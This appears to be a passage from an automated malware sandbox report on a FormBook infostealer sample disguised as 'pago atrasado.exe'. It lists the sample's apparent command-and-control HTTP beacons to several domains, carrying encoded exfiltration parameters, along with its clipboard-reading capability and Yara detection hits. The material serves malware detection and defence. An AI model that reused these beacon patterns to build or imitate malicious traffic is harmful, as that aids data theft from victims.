 Source: global traffic HTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1Host: www.highvizpeople.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1Host: www.oddanimalsink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1Host: www.everythangbutwhite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Contains functionality for read data from the clipboard Show sources

E-Banking Fraud:

 Yara detected FormBook Show sources
 Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

System Summary:

 Malicious sample detected (through community Yara rule) Show sources